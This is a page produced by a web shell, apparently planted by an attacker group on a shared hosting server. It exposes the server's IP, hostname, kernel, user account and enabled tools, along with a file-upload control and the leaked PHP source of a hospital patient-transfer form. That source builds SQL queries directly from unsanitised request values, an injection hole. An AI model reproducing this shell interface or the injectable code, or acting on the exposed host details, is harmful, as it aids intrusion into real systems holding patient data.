Mr.Fn4ticHz Shell

Server IP : 162.240.98.243 / Your IP : 18.188.137.58
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /home/btiyawmy/public_html/login.easenup.in/

Upload File :

[ HOME ]

Current File : /home/btiyawmy/public_html/login.easenup.in//transfertoipd.php

<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");

if(isset($_POST['transfertoipd'])) 
{
   PatientManager::transferreferal("$_GET[prescriptionid]","$_GET[patientid]","$_POST[Transfer_IPD]","$_POST[Word]","$_POST[Bed]","$_POST[Referred_To]","$_POST[Name_Hospital]","$_POST[Name_of_Consultant]","$_POST[followup]","$_POST[followup_date]","$_POST[enteredby]");
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
  <title>Document</title>

   </head>
  <body>
      <form name='transfertoipd' method='post'>
          <h3 align='center'>Transfer to IPD</h3>
<input type="hidden" name="Transfer_IPD" value='on'><label> Ward </label>
  
  <select onchange="loadbedva(this.value)" name="Word">
          <option value="" disabled selected>Ward</option>
<?php
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
$sql1 ="SELECT * FROM site_users WHERE userno='$harilal'";
		$qsql1 = mysqli_query($con,$sql1);
		while($rh1 = mysqli_fetch_array($qsql1))
		{
          	$sqldoctor= "SELECT * FROM department WHERE entered_by='$rh1[entered_by]' AND name='DP_Intensive_care' OR entered_by='$rh1[entered_by]' AND name='DP_General_ward' OR entered_by='$rh1[entered_by]' AND name='DP_SEMI_Pvt_ward' OR entered_by='$rh1[entered_by]' AND name='DP_Pvt_Ward'";
			$qsqldoctor = mysqli_query($con,$sqldoctor);
			while($rsdoctor = mysqli_fetch_array($qsqldoctor))
			{
             	echo "<option value='$rsdoctor[departmentid]'>$rsdoctor[name]-$rsdoctor[department_section]</option>";
}
				}
		  ?>
		  </select>
     <div id="pavnid">
       <label> Bed</label>  
      
          <input type="text" placeholder="Bed No." name="Bed"></div>
<br>
<input type="submit" name="transfertoipd" value="Submit">


</form>
</body>
</html>


<script>
 function  loadbedva(bedid)
{
	    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("pavnid").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET","loadbed.php?bedid="+bedid,true);
        xmlhttp.send();
}

</script>

Anon7 - 2022
AnonSec Team